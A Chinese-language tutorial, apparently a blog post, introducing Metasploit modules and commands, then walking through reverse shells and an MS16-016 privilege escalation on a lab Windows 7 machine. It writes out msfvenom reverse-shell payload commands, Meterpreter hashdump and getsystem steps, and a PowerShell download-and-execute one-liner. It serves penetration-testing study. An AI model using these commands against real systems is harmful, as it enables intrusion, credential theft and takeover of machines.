Metasploit基础

0x00:简介

Metasploit是一个漏洞利用框架,简称msf。是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击,,而且本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。

msf一般会有四种接口对外提供,分别为

  • msfconsole
  • msfcli
  • msfgui
  • msfweb

0x01:模块

  • exploit
 利用程序,针对漏洞、权限进行利用
  • payload
用于在目标系统中运行任意命令或执行特定代码,主要用于shell获取
  • auxiliary
该模块包含了扫描、嗅探、指纹识别、网络协议欺骗等相关功能模块
  • encoder
该模块主要针对exploit模块进行代码免杀,以逃过杀毒软件、防火墙、ids等安全防护机制的检测

0x03:基础命令

search mysql #查找
use exploit/multi/handler #使用
info #查看信息
show exploits/payloads/options #显示可用信息
exploit/run #执行
exploit -j #后台运行
back #返回上一级
sessions -i #查看当前可用会话
sessions -K #杀死所有活跃会话

getuid #获得运行Meterpreter会话的用户名,从而查看当前会话具有的权限
sysinfo #列出受控主机的系统信息
getprivs #尽可能多地获取目标主机上的特权
getsystem #通过各种攻击向量来提升到系统用户权限
hashdump #导出目标主机中的口令哈希值
screenshot #对目标主机的屏幕进行截图
background #将当前Meterpreter shell转为后台运行
quit #关闭当前Meterpreter会话,返回MSF终端
ps #显示所有运行进程以及关联的用户账户
migrate PID #迁移到一个指定的进程PID
execute -f cmd.exe -i# 执行从cmd.exe命令进行交互
shell #以所有可用令牌来运行一个交互的shell

生成exe程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

生成php程序

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

反弹shell

exploit/multi/hander
  1. Msfvenom生成程序
  2. 使用handler执行exp
  3. 在目标机器运行Msfvenom生成程序
  4. 返回session

将刚才生成的shy.php上传至另外一台主机的Web目录,进行访问

发现一个session已经传过来了

这便是一个简单的反弹shell的操作,如果要连接上只需执行如下命令即可

sessions -i 1


使用background命令使其回到后台运行

但是感觉连接的不是太稳定,容易出现超时状态。

exploit/multi/script/web_delivery
  1. 使用web_delivery返回脚本执行并加载exp
  2. 在目标机器运行脚本
  3. 返回session

先使用web_delivery

use exploit/multi/script/web_delivery

其次查看下信息

这里将targets设置为2,然后查找相应的payload进行设置

设置好之后,设置需要的参数

运行将下面的payload拿到目标机器中执行,反弹成功

这个方法相较于上一个稳定一点,这里就截一下目标机器的图片,测试一下


测试成功。

利用Metasploit提权

0x00:MS16-016漏洞简介

MS16-016(WebDAV特权提升漏洞),Microsoft Web分布式创作和版本管理(WebDAV)客户端验证输入不当,就会存在特权提升漏洞,成功利用此漏洞可以使用提升的特权执行任意代码

漏洞影响:

Windows Vista SP2
Windows Server 2008 x86 & x64
Windows Server 2008 R2 x64
Windows 7 x86 & x64
Windows 8.1 x86 & x64

环境准备:

win7 192.168.186.131
kail 192.168.186.134

还是先使用web_delivery进行反弹shell

连接成功,查看当前用户

接下来利用powershell远程下载Sherlock脚本并进行检测

powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1');Find-AllVulns" >shy.txt

发现存在MS16-016漏洞,直接使用msf搜索看是否有这个漏洞的exp

使用一下,选择一下session

use exploit/windows/local/ms16_016_webdav


进行攻击,即可提权到system

总结

这次的学习简单的了解了Metasploit,以及相应的提权操作,继续学习,冲冲冲!

提权学习之旅——利用Metasploit提权相关推荐

  1. 提权学习之旅——Linux操作系统提权

    首发于先知社区 https://xz.aliyun.com/t/8139 前言: 上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权 Linux提权基础 ...

  2. 提权学习:Linux普通用户提权为root

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Linux普通用户提权为root 接下来直接看实例 Linux普通用户提权为root 我记得我以前用Linux的时候,忘记root密码是常 ...

  3. 提权学习之旅——基础篇

    首发于先知社区 https://xz.aliyun.com/t/8054 前言: 无论是CTF赛题还是渗透测试,有很多时候拿到WebShell的权限并不高,没有办法继续深入,所以需要进行提权操作,方便 ...

  4. 2021-06-03web渗透学习之mof提权(MySQL 漏洞利用与提权)(转自国大佬)

    自从接触安全以来就 MySQL 的 UDF 提权.MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友. ...

  5. CVE-2014-7911 Android本地提权漏洞分析与利用

    概述 前面我们了解了Android Binder机制的基本原理,当然仅仅了解是不够的,我们要做到:Know it and hack it.这篇文章我们就来分析一个和Binder相关的漏洞:CVE-20 ...

  6. linux利用* vim提权,Linux使用suid vim.basic文件实现提权

    在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 ...

  7. 提权学习:第三方软件提权(Radmin 提权) 4899

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Radmin 提权 0x01 介绍 0x02 利用方式 常见虚拟主机常见路径 第一种方式:手工查询注册表爆hash值 第二种方式:通过大马 ...

  8. 提权学习:第三方软件提权(破解hash 提权、MFS 破解hash 提权、GetPass 破解hash提权、QuarksPwDump 破解hash提权)

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 破解hash 值提权 0x01 Pwdunp7 破解hash 0x02 GetPass 破解hash 0x03 hash传递入侵 MSF加 ...

  9. 提权学习:第三方软件提权(PcAnywhere 提权)5631

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 第三方软件提权 PcAnywhere 提权 0x01 介绍 0x02 原理 0x03 前言 0x04 思路: 0x05 操作步骤演示: 0 ...

最新文章

  1. wsld2java_脱离spring集成cxf(基于nutz框架)
  2. AOP切入点表达式 ——within表达式 、execution()表达式
  3. Java之线程同步练习
  4. 手把手实现YOLOv3(三)
  5. 登录centos虚拟机后显示-bash-4.1
  6. 成员变量的声明位置引起编译错误
  7. idea中git分支、合并与使用
  8. SpringBoot异常处理以及对数据正确性的检查
  9. mfc 学习的第二天
  10. 初识C语言—如何创建第一个C语言项目
  11. 音频压缩编码技术(四)—AAC编解码器
  12. vmware使用教程
  13. 城域网100G宽带传输设备实现客户接入链路告警
  14. 【原创】《矩阵的史诗级玩法》连载十七:用矩阵研究二次贝塞尔曲线和抛物线的关系(上)
  15. CorelDRAW平面设计标准教程免费视频教程
  16. 【云原生Docker系列第三篇】Docker网络模式(在失去的所有人里,我最怀念自己 )
  17. ipfs星际文件系统初体验
  18. 美监管“叫停”BUSD!是时候了解一下值得期待的几个新DeFi 稳定币了
  19. 【NOIP模拟】旷野大计算
  20. QT(2)-QRegExp

热门文章

  1. java项目嗖嗖移动业务大厅项目报告_晋江市撰写节能评估报告的报告机构立项范本-文瑞...
  2. 搜出来的文本:基于BERT的文本采样
  3. 来不及想标题了,我要去打包收藏了 | 本周值得读
  4. 邮件excel html,小数点分隔符在电子邮件(HTML/CSS)在Excel的VBA编程
  5. RabbitMQ使用手册
  6. SQL:在使用分组函数统计并进行分组时,发现有两条除了统计数据不一样,其他都一样的数据
  7. 牛客题霸 NC15 求二叉树的层序遍历
  8. C#——《C#语言程序设计》实验报告——泛型与集合——运算符重载
  9. android地图路径绘制,android:利用svg的path路径+canvas 开发自定义地图控件
  10. springboot(2.2.4)全局异常处理(RestControllerAdvice,ExceptionHandler)